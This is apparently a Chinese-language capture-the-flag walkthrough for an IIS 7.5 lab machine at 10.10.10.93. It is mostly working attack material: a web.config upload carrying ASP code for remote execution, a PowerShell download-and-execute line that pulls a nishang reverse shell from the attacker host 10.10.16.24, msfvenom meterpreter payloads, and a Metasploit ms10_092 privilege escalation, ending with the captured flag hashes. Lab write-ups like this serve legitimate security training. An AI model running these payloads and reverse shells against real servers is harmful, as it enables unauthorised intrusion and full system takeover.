信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.93 | TCP:80 |
$ nmap -p- 10.10.10.93 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION │
80/tcp open http Microsoft IIS httpd 7.5 │
|_http-server-header: Microsoft-IIS/7.5 │
|_http-title: Bounty │
| http-methods: │
|_ Potentially risky methods: TRACE │
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP
$ feroxbuster -u http://10.10.10.93/ -x asp,aspx,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n
web.config 代码注入 & PS 反向shell
但是无法通过访问http://10.10.10.93/UploadedFiles/buff.aspx 执行命令…
这里可以先通过burp爆破文件后缀,可以发现config后缀的文件允许上传
<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
上传web.config,访问http://10.10.10.93/uploadedfiles/web.config发现代码执行了。
$ wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1;echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032'>>Invoke-PowerShellTcp.ps1
再次上传web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer>
</configuration>
<%@ Language=VBScript %>
<%call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.16.24/Invoke-PowerShellTcp.ps1')")
%>
PS C:\users\merlin\desktop> PS C:\users\merlin\desktop> gci -force
User.txt
be952a25cdc0106a03cbc3deb5d7fd19
权限提升
> systeminfo
内核权限提升 - Metasploit
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 10033
msf6 exploit(multi/handler) > run
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10033 -f psh -o recv.ps1
> iex(new-object net.webclient).downloadstring('http://10.10.16.24/recv.ps1')
> recv.ps1
meterpreter > bg
查看可进行权限提升的漏洞
msf6 > use multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run
ms10_092权限提升
msf6 exploit(multi/handler) > use windows/local/ms10_092_schelevator
msf6 exploit(windows/local/ms10_092_schelevator) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.16.24
msf6 exploit(windows/local/ms10_092_schelevator) > set session 2
msf6 exploit(windows/local/ms10_092_schelevator) > set AutoCheck false
msf6 exploit(windows/local/ms10_092_schelevator) > run
Root.txt
2191c45301ab454267720c13689e9b8c
